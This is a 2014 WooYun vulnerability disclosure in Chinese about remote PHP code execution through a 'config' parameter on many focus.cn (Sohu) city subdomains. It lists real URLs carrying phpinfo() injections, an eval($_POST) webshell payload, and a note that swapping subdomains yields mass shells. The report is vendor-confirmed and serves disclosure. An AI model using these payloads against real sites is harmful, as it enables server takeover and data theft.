[公开漏洞]搜狐(第二季)旗下某站通用型命令执行第五集(批量shell，自带后门)

搜狐(第二季)旗下某站通用型命令执行第五集(批量shell，自带后门) 相关厂商：搜狐漏洞作者：浩天提交时间：2014-06-03 16:10 公开时间：2014-07-18 16:11 漏洞类型：命令执行危害等级：高自评Rank：20 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签： webshell 远程命令执行 php代码执行 webshell webshell 漏洞详情披露状态：

2014-06-03：细节已通知厂商并且等待厂商处理中
2014-06-03：厂商已经确认，细节仅向厂商公开
2014-06-13：细节向核心白帽子及相关领域专家公开
2014-06-23：细节向普通白帽子公开
2014-07-03：细节向实习白帽子公开
2014-07-18：细节向公众公开

简要描述：

之前的案例获取到了大量的mysql信息，一直缺shell，我的漏洞也都到日期公布了，很多白帽子蜂拥而至，抢生意了，都戒撸了，看来我是剁手党吖

详细说明：

不同的服务器名：批量shell的感觉不一样吖

http://sz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://gz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://cd.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://bj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://sh.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://hz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://tj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://cq.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://sjz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://nj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://sy.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://puyang.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

......还有很多，跟之前的sql注一样，替换地区域名即可实现批量shell

漏洞证明：

没传shell，自带后门，呵呵

http://sz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={eval($_POST[c])}&type=sale

数据库配置信息泄露一地吖，不读了，有shell，其实很开心

,漫不漫游的就这么回事吧

修复方案：

原始开发人员自留的后门？？

漏洞回应 厂商回应： 危害等级：高 漏洞Rank：20 确认时间：2014-06-03 16:42 厂商回复： 感谢对搜狐安全关注 最新状态： 暂无

漏洞回应厂商回应：
危害等级：高

漏洞Rank：20

确认时间：2014-06-03 16:42
厂商回复：
感谢对搜狐安全关注
最新状态：
暂无